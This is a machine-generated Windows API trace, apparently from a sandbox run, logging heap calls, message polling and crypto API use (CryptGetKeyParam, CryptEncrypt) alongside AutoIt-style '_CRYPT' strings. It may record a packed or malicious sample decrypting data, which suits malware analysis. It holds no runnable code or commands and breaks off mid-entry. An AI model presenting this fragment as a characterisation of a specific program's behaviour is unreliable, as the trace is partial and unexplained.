[0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0164.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d440 [0164.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.420] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0164.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0164.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0164.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0164.421] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2638, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2638*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0164.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0164.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0164.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0164.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0164.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.424] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0164.424] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0164.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0164.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0164.426] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0164.426] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0164.426] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0164.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.426] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0164.427] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0164.427] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.427] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.427] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0164.427] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.427] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0164.427] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.427] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0164.427] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0164.427] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.427] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0164.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0164.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0164.428] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.428] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0164.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0164.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0164.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0164.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0164.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.429] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xbc0c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xbc10) returned 1 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0164.429] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0164.429] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.429] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0164.429] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0164.429] RtlAllocateHeap 